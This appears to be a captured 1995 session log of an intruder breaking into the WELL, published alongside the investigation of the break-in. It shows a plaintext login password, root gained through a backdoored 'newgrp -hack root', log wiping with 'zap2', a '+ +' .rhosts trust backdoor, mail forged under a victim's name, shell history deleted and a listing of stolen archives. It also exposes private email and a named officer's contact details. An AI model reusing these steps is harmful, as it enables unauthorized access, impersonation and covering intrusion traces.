Kevin On Demand
- Kevin is a Good Name - kevin-on-demand.takedown.com 4003
- Start: 1995 Feb 5 20:20:21
- Total Run Time: 9:50
- From teal.csn.org to well.sf.ca.us.
- Kevin tries to forge mail to Jon Littman from himself. He's found a message from Capt. Kevin Ziese, of the Air Force Information Warfare Center, and altered it slightly. Is this Kevin's secret way of communicating with Jon Littman? This session was altered slightly to preserve the confidentiality of Jon Littman's mail.
UNIX(r) System V Release 4.0 (well)
This is the WELL
Type newuser to sign up.
Type trouble if you are having trouble logging in.
Type guest to learn about the WELL.
If you already have a WELL account, type your username.
login: dono
Password: fucknmc
Welcome to the WELL
You own your own words. This means that you are responsible
for the words that you post on the WELL and that reproduction of those
words without your permission in any medium outside of the WELL's
conferencing system may be challenged by you, the author.
**Default prompts on the WELL changed on Monday. If you use a program
**such as Eudora or Sweeper to login, then type extract news 1706 100
**NEW LOWER DISK STORAGE RATES EFFECTIVE FEBRUARY 1st. FOR MORE INFORMATION
**Type !extract news 867 18
You have mail.
well% newgrp -hack root
# ./zap2 dono
Zap2!
# ./zap2 dono
Zap2!
# csh
well# ./zap2 dono
Zap2!
well# !!
./zap2 dono
^C
well#
well#
well#
well# pwd
/home/d/o/dono
well# cp 143 /home/j/l/littman
well# rm 143
well# newgrp -hack jlittman
$ cd /home/j/l/jlittman
$ ls t-0la
t-0la: No such file or directory
$ ls -tla
total 1658
drwxr-sr-x 32 root sys 512 Feb 5 20:22 ..
-rw------- 1 jlittman well 391829 Feb 3 08:11 .inbox
-rw------- 1 jlittman well 431576 Feb 3 08:11 mbox
drwxr-xr-x 2 jlittman well 512 Feb 2 14:05 .
-rw-r--r-- 1 jlittman well 0 Jan 26 18:02 .news_time
-rw------- 1 jlittman well 26 Jan 4 21:46 .sh_history
-rw------- 1 jlittman well 755 Dec 20 10:48 dead.letter
-rw------- 1 jlittman well 191 Oct 31 12:23 .bash_history
$ mv /home/j/l/littman/143 .
mv: cannot access /home/j/l/littman/143
$ newgrp -hack root
# mv /home/j/l/littman .
# ls
dead.letter littman mbox
# /usr/etc/chown jlittman *
/usr/etc/chown: not found
# cat > .rhosts
+ +
^D
# chown jlittman .r* lit*
# ls -tla
total 1672
-rw------- 1 jlittman other 4 Feb 5 20:23 .rhosts
drwxr-xr-x 2 jlittman well 512 Feb 5 20:23 .
drwxr-sr-x 32 root sys 512 Feb 5 20:22 ..
-rw-rw-rw- 1 jlittman sys 5352 Feb 5 20:22 littman
-rw------- 1 jlittman well 391829 Feb 3 08:11 .inbox
-rw------- 1 jlittman well 431576 Feb 3 08:11 mbox
-rw-r--r-- 1 jlittman well 0 Jan 26 18:02 .news_time
-rw------- 1 jlittman well 26 Jan 4 21:46 .sh_history
-rw------- 1 jlittman well 755 Dec 20 10:48 dead.letter
-rw------- 1 jlittman well 191 Oct 31 12:23 .bash_history
# rlogin localhost -l jlittman
Last login: Fri Feb 3 08:05:58 from ts-tty7-fast
Welcome to the WELL
You own your own words. This means that you are responsible
for the words that you post on the WELL and that reproduction of those
words without your permission in any medium outside of the WELL's
conferencing system may be challenged by you, the author.
**Default prompts on the WELL changed on Monday. If you use a program
**such as Eudora or Sweeper to login, then type extract news 1706 100
**NEW LOWER DISK STORAGE RATES EFFECTIVE FEBRUARY 1st. FOR MORE INFORMATION
**Type !extract news 867 18
You have mail.
PicoSpan. WELL version W2.0c (01/31/95).
Copyright (c) 1984 (version T3.2), NETI.
Upcoming WELL Events: (type noevents to turn this message off)
Feb 17 WELL Office Party #101 (g news ; s 1714)
_ __________ __
| | / / ____/ / / / NEW USERS: Please read topics 1 and 2 for
| | /| / / __/ / / / / important info about this conference. Type
| |/ |/ / /___/ /___/ /___ s 1 2 and press [Return] at the OK prompt.
|__/|__/_____/_____/_____/
Question and Answers Topic: see 180
_________ ____ ___ ___ Introduce Yourself: see 181
/ ___/ __ \/ __ `__ \/ _ \ WELL Office Party see 183
/ /__/ /_/ / / / / / / __/
\___/\____/_/ /_/ /_/\___/ Type r at Respond prompt to enter a
response.
... to the WELLcome
conference! For help from a real person: type: helpers
WELLcome conference menu: type: wellcome
To contact WELL Customer support, mail support or call us (voice) at
415-332-4335 (6am-10pm Pacific Time Mon-Fri, 12pm-8pm Sat-Sun).
10 newresponse topics and 18 brandnew topics
First topic 1, last 193
You have mail.
OK (? for help): ^CInterrupt!
OK (? for help): ls
dead.letter littman mbox
OK (? for help): mail jlittman
Subject: here you go :-) A vision from God
~>littman
~
~r littman
<j
~r> a
^C
(Interrupt -- one more to kill letter)
^C
OK (? for help): rm dead*
"rm" is not a valid command at this prompt. Type help for help.
OK (? for help): ls -tla
total 1672
-rw------- 1 jlittman well 34 Feb 5 20:24 dead.letter
-rw------- 1 jlittman other 4 Feb 5 20:23 .rhosts
drwxr-xr-x 2 jlittman well 512 Feb 5 20:23 .
drwxr-sr-x 32 root sys 512 Feb 5 20:22 ..
-rw-rw-rw- 1 jlittman sys 5352 Feb 5 20:22 littman
-rw------- 1 jlittman well 391829 Feb 3 08:11 .inbox
-rw------- 1 jlittman well 431576 Feb 3 08:11 mbox
-rw-r--r-- 1 jlittman well 0 Jan 26 18:02 .news_time
-rw------- 1 jlittman well 26 Jan 4 21:46 .sh_history
-rw------- 1 jlittman well 191 Oct 31 12:23 .bash_history
OK (? for help): sh
Use ^D to exit
$ rm dead*
$ rm .rhosts
$ mail^C
$ cat littman | mail jlittman
$ tail .inbox
=========================================================
Capt Kevin J. Ziese ziese@chaos.csap.af.mil
Chief, Countermeasures Development 1-210-377-0477 Voice
AF Information Warfare Center 1-210-377-1326 Fax
1100 NW Loop 410, Suite 607 1-800-217-0570 Pager
San Antonio, Texas 78213
=========================================================
$ rm littman
$ tail -100 jlittman
tail: cannot open input
$ tail -100 .inbox
Return-Path: jlittman
Received: (from jlittman@localhost) by well.sf.ca.us (8.6.9/8.6.9) id UAA11263 f
or jlittman; Sun, 5 Feb 1995 20:25:24 -0800
Date: Sun, 5 Feb 1995 20:25:24 -0800
From: Jon Littman <jlittman>
Message-Id: <199502060425.UAA11263@well.sf.ca.us>
To: jlittman
>Of interest also was that the tools were subsequently posted at an .edu
>site and then taken off the net by their administrators.
Tsutomu and I discussed this attack in depth, over dinner, and he never
mentioned his tools being posted somewhere; I think what may have happened is
confusing definitions -- tools like "gimme which is the ankle-biters weapon of
choice' vs tools like 'the interface builder builder, which I defy anyone to
execute outside Tsutomu's lab having seen it in operation firsthand. It's
sweet, but it's just not going to be a compressed tar file you download and
uncompress, it requires a great deal of careful planning and preprocessing
before use. And my comments are based on sitting with Tsutomu last summer and
having him show me how the 'advanced' tools work.
>
>This incident is just the tip of the iceberg. I'm fear that we all may get
>spooled off in a router discussion eddy and miss the importance of what the
>other tools were and what they do.
>
>How's that for another catalyst?
>
>
Tsutomu Shimomura and I were on the system vulnerabilities session of the
conference referenced in the article -- and it was his system that was
attacked. We discussed, privately, the attack at length. The 'tools' that
were stolen are far less significant than might be expected for three reasons:
(1) this attack, in an even more elementary form, was launched, successfully,
on his system last summer and most of the tools were originally pilfered then
-- not now. (2) the tools, were more snippets of code that require the
original code architect to string them together and compile and execute. (3)
the crackers don't necessarily need sophisticated tools, and will be loath to
use pilfered, and very complicated (i.e. easily attributed) ones if they're
intelligent, because if caught intruding it will also be evidence they broke
into a research system in San Diego. I would like to discuss another thread
of all this though.
AF testing has verified that 50% of the systems on the net, within the .af.mil
domain, are vulnerable to penetration with the simplest techniques. On 80% of
those 50% my team can get root use equally simple techniques. Although the IP
spoofing is interesting let's work the math, because our metric data indicates
that 95% of what's reported is ankle-biting not roicket science. There's no
denying that IP spoofing is severe and it could hurt a lot of us and it should
be fixed, unfortunately so should world hunger -- the problem is you can't fix
everything, nor can you fix a lot of things at once -- you have to prioritize
based on what is happening, not what might happen. For instance, if
experience data indicates that sendmail is still wide open on most systems,
even if you prevent IP spoofing sendmail is still vulnerable. This is
important because yopu'll have stopped one IP spoofer, but 95 others crackers
will have snatched the code you built using sendmail. It's a hollow argument
to say sendmail should be updated because as 8lgm will demonstrate at midnight
on 6 Feb -- the newest version of sendmail is still vulnerable. We need to
identify the tope ten problems, and proactively prevent them. I know,
metrically, what the Air Force's top ten are and we are working on the short
erm solution. Until that's fixed, I'm willing to bite the bullet and accept
what I cannot change -- for the moment.
Were am I going? First, the tools taken from Tsutomu will most likely not be
seen for a while because unlike the gimme program, there were code snippets
not functional shell scripts AND they can be easily attributed to him. Two,
ip spoofing is bad, but the ankle biters are worse because our systems (yours
and mine) are vulnerable to the most elementary attacks and as long as that
stands, the exotic ones should be counted but not obsessed over.
Finally, I wonder if the people on this list would share metric data? Since
things like number of attacks, number of successes, and number of compromises
(along with things like the top ten attacks you've seen) would not hold a site
up to the microscope and would not compromise site data -- but it would let us
identify the top ten, real world, problems. If we could achieve even a modest
goal like this, we could confidently say "these are the immediate
countermeasures that must be built." I am willing to share AF metric data at
this level to help strengthen the community as a whole. I'm also willing to
accept and maintain this data in something like an email server were yopu
email your new input and the list gets emailed the new metrics. Any thoughts
on this?
I'd like to thank Frank for being a catalyst. Often times I'm reluctant to
post anything because I like to listen to everyone else's thoughts first. It
just seemed like everyone was thinking the same thing I was so I decided to
'share' ;)
Kevin
**** Hey john, Kevin is a good name :-)
=========================================================
Capt Kevin J. Ziese ziese@chaos.csap.af.mil
Chief, Countermeasures Development 1-210-377-0477 Voice
AF Information Warfare Center 1-210-377-1326 Fax
1100 NW Loop 410, Suite 607 1-800-217-0570 Pager
San Antonio, Texas 78213
=========================================================
$ ^D
You have more mail.
OK (? for help): ^D
You're now leaving the WELLcome conference.
compiling data...
jlittman, your current disk usage and charges are:
Current disk usage: 835 Kbytes
Estimated charge for today's disk use: $ 0.17
Disk charges incurred since start of Feb: $ 0.83
User: jlittman, charges added to your bill this session are:
Usage: 3 minutes at $2.00 an hour, $ 0.10
Total: $ 0.10
Note: These totals do NOT include International Surcharges,
nor credits for your first 5 hours on The WELL. For more
information, call The WELL @ (415) 332-4335, or type
!billing at almost any prompt.
Thanks :-)
Connection closed.
# zap2 jlittman
zap2: not found
# cd
# ./zap2 jlittman
Zap2!
# cd /home/j/l/jlittman
# ls -tla
total 1672
-rw------- 1 jlittman well 142 Feb 5 20:25 .sh_history
drwxr-xr-x 2 jlittman well 512 Feb 5 20:25 .
-rw------- 1 jlittman well 397497 Feb 5 20:25 .inbox
drwxr-sr-x 32 root sys 512 Feb 5 20:22 ..
-rw------- 1 jlittman well 431576 Feb 3 08:11 mbox
-rw-r--r-- 1 jlittman well 0 Jan 26 18:02 .news_time
-rw------- 1 jlittman well 191 Oct 31 12:23 .bash_history
# rm .sh*
# tail -50 .inbox
everything, nor can you fix a lot of things at once -- you have to prioritize
based on what is happening, not what might happen. For instance, if
experience data indicates that sendmail is still wide open on most systems,
even if you prevent IP spoofing sendmail is still vulnerable. This is
important because yopu'll have stopped one IP spoofer, but 95 others crackers
will have snatched the code you built using sendmail. It's a hollow argument
to say sendmail should be updated because as 8lgm will demonstrate at midnight
on 6 Feb -- the newest version of sendmail is still vulnerable. We need to
identify the tope ten problems, and proactively prevent them. I know,
metrically, what the Air Force's top ten are and we are working on the short
term solution. Until that's fixed, I'm willing to bite the bullet and accept
what I cannot change -- for the moment.
Were am I going? First, the tools taken from Tsutomu will most likely not be
seen for a while because unlike the gimme program, there were code snippets
not functional shell scripts AND they can be easily attributed to him. Two,
ip spoofing is bad, but the ankle biters are worse because our systems (yours
and mine) are vulnerable to the most elementary attacks and as long as that
stands, the exotic ones should be counted but not obsessed over.
Finally, I wonder if the people on this list would share metric data? Since
things like number of attacks, number of successes, and number of compromises
(along with things like the top ten attacks you've seen) would not hold a site
up to the microscope and would not compromise site data -- but it would let us
identify the top ten, real world, problems. If we could achieve even a modest
goal like this, we could confidently say "these are the immediate
countermeasures that must be built." I am willing to share AF metric data at
this level to help strengthen the community as a whole. I'm also willing to
accept and maintain this data in something like an email server were yopu
email your new input and the list gets emailed the new metrics. Any thoughts
on this?
I'd like to thank Frank for being a catalyst. Often times I'm reluctant to
post anything because I like to listen to everyone else's thoughts first. It
just seemed like everyone was thinking the same thing I was so I decided to
'share' ;)
Kevin
**** Hey john, Kevin is a good name :-)
=========================================================
Capt Kevin J. Ziese ziese@chaos.csap.af.mil
Chief, Countermeasures Development 1-210-377-0477 Voice
AF Information Warfare Center 1-210-377-1326 Fax
1100 NW Loop 410, Suite 607 1-800-217-0570 Pager
San Antonio, Texas 78213
=========================================================
# last jlittman
working...
jlittman pts/43 ts-tty7-fast Feb 3 08:05:58 - Feb 3 08:11:52 (00:05)
jlittman pts/43 ts-tty21-fast Feb 2 20:56:16 - Feb 2 22:31:20 (01:35)
jlittman pts/3 ts-tty32-fast Feb 2 16:29:35 - Feb 2 16:32:51 (00:03)
jlittman pts/60 ts-tty10-fast Feb 2 13:55:54 - Feb 2 14:05:29 (00:09)
# pwd
/home/j/l/jlittman
# cd /home/j/l/jlittman
# ls -tla
total 1670
drwxr-xr-x 2 jlittman well 512 Feb 5 20:27 .
-rw------- 1 jlittman well 397497 Feb 5 20:25 .inbox
drwxr-sr-x 32 root sys 512 Feb 5 20:22 ..
-rw------- 1 jlittman well 431576 Feb 3 08:11 mbox
-rw-r--r-- 1 jlittman well 0 Jan 26 18:02 .news_time
-rw------- 1 jlittman well 191 Oct 31 12:23 .bash_history
# cd /home/f/a/fairdemo
# ls -tla
total 199160
-rw-r--r-- 1 fairdemo well 297223 Jan 31 19:41 zipstuff.tar.Z
drwxr-xr-x 9 fairdemo well 1536 Jan 31 19:41 .
-rw-r--r-- 1 fairdemo well 10402 Jan 31 19:41 tcpd.tar.gz.crypt
-rw-r--r-- 1 fairdemo well 260032 Jan 31 19:41 sendmail.tar.Z
-rw-r--r-- 1 fairdemo well 139047 Jan 31 19:41 tcpd.tar.Z
-rw-r--r-- 1 fairdemo well 1506579 Jan 31 19:41 pw-backup.23.tar.Z
-rw-r--r-- 1 fairdemo well 257615 Jan 31 19:41 oldnw.tar.Z
-rw-r--r-- 1 fairdemo well 184864 Jan 31 19:41 oldctek.tar.Z
-rw-r--r-- 1 fairdemo well 6813202 Jan 31 19:41 o.tar.Z
-rw-r--r-- 1 fairdemo well 8142621 Jan 31 19:41 nw.tar.Z
-rw-r--r-- 1 fairdemo well 341563 Jan 31 19:41 nfs.tar.gz
-rw-r--r-- 1 fairdemo well 11185 Jan 31 19:41 vsr.gz.crypt
-rw-r--r-- 1 fairdemo well 440996 Jan 31 19:41 marty.tar.gz.crypt
-rw-r--r-- 1 fairdemo well 1085700 Jan 31 19:41 sgstuff.gz
-rw-r--r-- 1 fairdemo well 4910 Jan 31 19:41 sniffer.c.gz
-rw-r--r-- 1 fairdemo well 1495040 Jan 31 19:41 mail.tar
-rw-r--r-- 1 fairdemo well 0 Jan 31 19:41 out.gz
-rw-r--r-- 1 fairdemo well 10247 Jan 31 19:41 ifj.c.gz.crypt
-rw-r--r-- 1 fairdemo well 5947301 Jan 31 19:41 kocher.tar.Z
-rw-r--r-- 1 fairdemo well 2251792 Jan 31 19:41 foo.gz
-rw-r--r-- 1 fairdemo well 370808 Jan 31 19:41 cards.gz
-rw-r--r-- 1 fairdemo well 187350 Jan 31 19:41 eye.tar.gz
-rw-r--r-- 1 fairdemo well 2255535 Jan 31 19:41 0108.gz
-rw-r--r-- 1 fairdemo well 50942 Jan 31 19:41 btraq.tar.gz
-rw-r--r-- 1 fairdemo well 2021961 Jan 31 19:41 c68ka.tar.Z
-rw-r--r-- 1 fairdemo well 1579270 Jan 31 19:41 c68hx.tar.Z
-rw-r--r-- 1 fairdemo well 1685847 Jan 31 19:41 c68hs.tar.Z
-rw-r--r-- 1 fairdemo well 1685488 Jan 31 19:41 c68ha.tar.Z
-rw-r--r-- 1 fairdemo well 1016017 Jan 31 19:41 a68hx.tar.Z
-rw-r--r-- 1 fairdemo well 205725 Jan 31 19:41 1022csn.tar.Z
-rw-r--r-- 1 fairdemo well 48786 Jan 31 19:40 zipcrypt.zip
-rw-r--r-- 1 fairdemo well 50599 Jan 31 19:40 key2.zip
-rw-r--r-- 1 fairdemo well 136912 Jan 31 19:40 zipcrack.zip
-rw-r--r-- 1 fairdemo well 61120407 Jan 28 15:46 irix53.taz
drwxr-sr-x 32 root sys 1024 Dec 13 11:24 ..
-rw------- 1 fairdemo well 4543 Nov 8 16:05 .inbox
-rw------- 1 fairdemo well 3845 Nov 4 13:28 .pine-debug1
-rw------- 1 fairdemo well 7784 Nov 4 13:28 .pinerc
drw-r--r-- 2 fairdemo well 512 Oct 30 08:39 mail
drwxr-xr-x 4 fairdemo well 512 Oct 30 08:39 .tin
drwxr--r-- 2 fairdemo well 512 Oct 30 08:39 .nn
drwx--x--x 2 fairdemo well 512 Oct 30 08:39 .cfdir
drw-r--r-- 2 fairdemo well 512 Oct 30 04:39 News
drwx------ 2 fairdemo well 512 Oct 30 04:39 .elm
drw-r--r-- 2 fairdemo well 512 Oct 30 04:39 Mail
-rw-r--r-- 1 fairdemo well 0 Oct 28 17:34 .news_time
-rw------- 1 fairdemo well 20 Oct 19 20:22 .sh_history
-rw------- 1 fairdemo well 67 Oct 14 11:13 .profile
-rw------- 1 fairdemo well 0 Oct 14 11:12 .noidle
-rw-r--r-- 1 fairdemo well 193 Oct 12 18:49 .plan
-rw------- 1 fairdemo well 30 Oct 12 18:23 .addressbook
-rw------- 1 fairdemo well 145 Jul 7 1994 .newsrc
-rw------- 1 fairdemo well 97 Jul 7 1994 .oldnewsrc
-rw-r--r-- 1 fairdemo well 25 Jul 7 1994 .profile.old
-rw-r--r-- 1 fairdemo well 62 Jul 7 1994 .newsrc.old
-rw------- 1 fairdemo well 0 Apr 5 1994 .inbox.pop
-rw-r--r-- 1 fairdemo well 60 Mar 28 1994 .downrc
-rw------- 1 fairdemo well 3 Mar 28 1994 .uprc
-rw------- 1 fairdemo well 39 Mar 28 1994 .cflist
-rw-r--r-- 1 fairdemo well 3 Mar 23 1994 .welltour
-rw-r--r-- 1 fairdemo well 9 Jan 21 1994 .mailrc
-rw-r--r-- 1 fairdemo well 0 Nov 14 1993 .gopherrc
-rw-r--r-- 1 fairdemo well 50 Nov 14 1993 .newsrc.bak
-rw-r--r-- 1 fairdemo well 3 Nov 14 1993 .rnprofile
# ls
0108.gz c68ka.tar.Z mail.tar sendmail.tar.Z
1022csn.tar.Z cards.gz marty.tar.gz.crypt sgstuff.gz
Mail eye.tar.gz nfs.tar.gz sniffer.c.gz
News foo.gz nw.tar.Z tcpd.tar.Z
a68hx.tar.Z ifj.c.gz.crypt o.tar.Z tcpd.tar.gz.crypt
btraq.tar.gz irix53.taz oldctek.tar.Z vsr.gz.crypt
c68ha.tar.Z key2.zip oldnw.tar.Z zipcrack.zip
c68hs.tar.Z kocher.tar.Z out.gz zipcrypt.zip
c68hx.tar.Z mail pw-backup.23.tar.Z zipstuff.tar.Z
# ^D
well# ^D
well% ^D